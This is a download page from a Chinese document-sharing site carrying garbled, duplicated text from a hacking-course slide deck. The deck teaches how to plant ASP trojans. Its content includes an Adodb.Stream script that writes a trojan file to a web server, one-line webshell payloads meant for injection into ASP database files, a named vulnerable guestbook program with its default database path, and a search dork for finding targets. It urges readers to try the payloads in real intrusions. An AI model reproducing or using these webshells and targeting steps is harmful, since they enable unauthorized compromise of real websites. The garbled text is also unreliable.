ImageVerifierCode 换一换
格式:PPT , 页数:11 ,大小:246KB ,
资源ID:14247389      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/14247389.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(黑侠脚本课程4PPT文件格式下载.ppt)为本站会员(b****1)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

黑侠脚本课程4PPT文件格式下载.ppt

1、/ method=post 一个提交表单一个提交表单一个提交表单一个提交表单n n n nset lP=server.CreateObject(Adodb.Stream)set lP=server.CreateObject(Adodb.Stream)n nlP.Open lP.Open n nlP.Type=2 lP.Type=2 n nlP.CharSet=gb2312 lP.CharSet=gb2312 n nlP.writetext request(p)lP.writetext request(p)n nlP.SaveToFile server.mappath(conn.asp),2 l

2、P.SaveToFile server.mappath(conn.asp),2 n nlP.Close lP.Close n nset lP=nothing set lP=nothing n nresponse.redirect conn.asp response.redirect conn.asp n n n n这填马的代码这填马的代码 n ninput type=submit value=n n/n n/程序的主要框架是/取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示/添加木马内容用的 n n我们一句一句分析:我们一句一句分析:n n/action=后面是需要修改的以as

3、p命名的数据库的提交地址/这个标签的意思是建立一个表单 以post方式提交给连接http:/ /这里的这里的valuevalue值根据服务端值根据服务端中中valuevalue而设定而设定/可以自行修改成可以自行修改成相应这里的相应这里的valuevalue值也必须改值也必须改为为p pset lP=server.createObject(Adodb.Stream)/set lP=server.createObject(Adodb.Stream)/建立流对象,有了对象才可以建立流对象,有了对象才可以使用它固有的属性和方法使用它固有的属性和方法 lP.Open/lP.Open/打开打开lP.Ty

4、pe=2/lP.Type=2/以文本方式以文本方式lP.CharSet=gb2312/lP.CharSet=gb2312/字体标准字体标准lP.writetext request(joeving)/lP.writetext request(joeving)/取得木马内容取得木马内容 参数参数joevingjoeving可以自己定义可以自己定义 但但必须和下面的必须和下面的name=joevingname=joeving相对应相对应lP.SaveToFile server.mappath(wei.asp),2 lP.SaveToFile server.mappath(wei.asp),2/将木马

5、内容以覆盖文件的方式写入将木马内容以覆盖文件的方式写入wei.aspwei.asp/2/2就是已覆盖的方式,这里的就是已覆盖的方式,这里的wei.aspwei.asp也是可以自己定义的,如定义成也是可以自己定义的,如定义成1.asp1.asp/但和下面的但和下面的response.redirectwei.aspresponse.redirectwei.asp中中wei.aspwei.asp的保持一致的保持一致lP.Close lP.Close/关闭对象关闭对象set lP=nothing set lP=nothing/释放对象释放对象response.redirect wei.asp resp

6、onse.redirect wei.asp/转向生成的转向生成的wei.asp wei.asp 和上面的和上面的wei.aspwei.asp相对应,相对应,也就是你熟悉的也就是你熟悉的aspasp木马登木马登 陆界面陆界面/这段程序的功能:利用插入到数据库文件的这段程序的功能:利用插入到数据库文件的%execute request(value)%这段代码执行第一个这段代码执行第一个textareatextarea中的内容,并将添加的木马中的内容,并将添加的木马内容写入和指向内容写入和指向wei.aspwei.asp,这样就相当于在服务器上建立了个,这样就相当于在服务器上建立了个aspasp木马

7、文件,木马文件,这样就可以取得这样就可以取得webshellwebshell了了 n n添入生成木马的内容/textarea/这段标签是你用来添加木马内容用的 返回一句话木马的形式n nn n这句是服务端,配合客户端使用这句是服务端,配合客户端使用n n%execute request(huan)%n n%n nif request(huan)then execute if request(huan)then execute request(huan)request(huan)n n%n n%3C%25execute%20request(%22a%22)%25%3E%3C%25execute%

8、20request(%22a%22)%25%3En n还有很多我就不一一介绍了还有很多我就不一一介绍了 自己在入侵中测试吧自己在入侵中测试吧返回实践漏洞n n为了更容易理解,我找了个简单的留言本,修改出来漏洞,来为大家演示返回课后作业n n测试程序:音乐听吧测试程序:音乐听吧n n代码下载:代码下载:http:/ n代码缺陷:默认留言数据库为代码缺陷:默认留言数据库为aspasp并且没做防下载并且没做防下载处理处理n n默认数据库地址:默认数据库地址:/gbook/zpinfo_music_guest.asp/gbook/zpinfo_music_guest.aspn n搜索引擎搜索:本站所有搜索引擎搜索:本站所有MP3MP3只链接收集自网上,只链接收集自网上,其版权属歌手本人或其所属唱片公司所有,用户其版权属歌手本人或其所属唱片公司所有,用户请在下载后的请在下载后的2323小时内删除小时内删除MP3MP3歌曲,请购买正歌曲,请购买正版版CDCD以支持你们的偶像!谢谢合作!以支持你们的偶像!返回

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1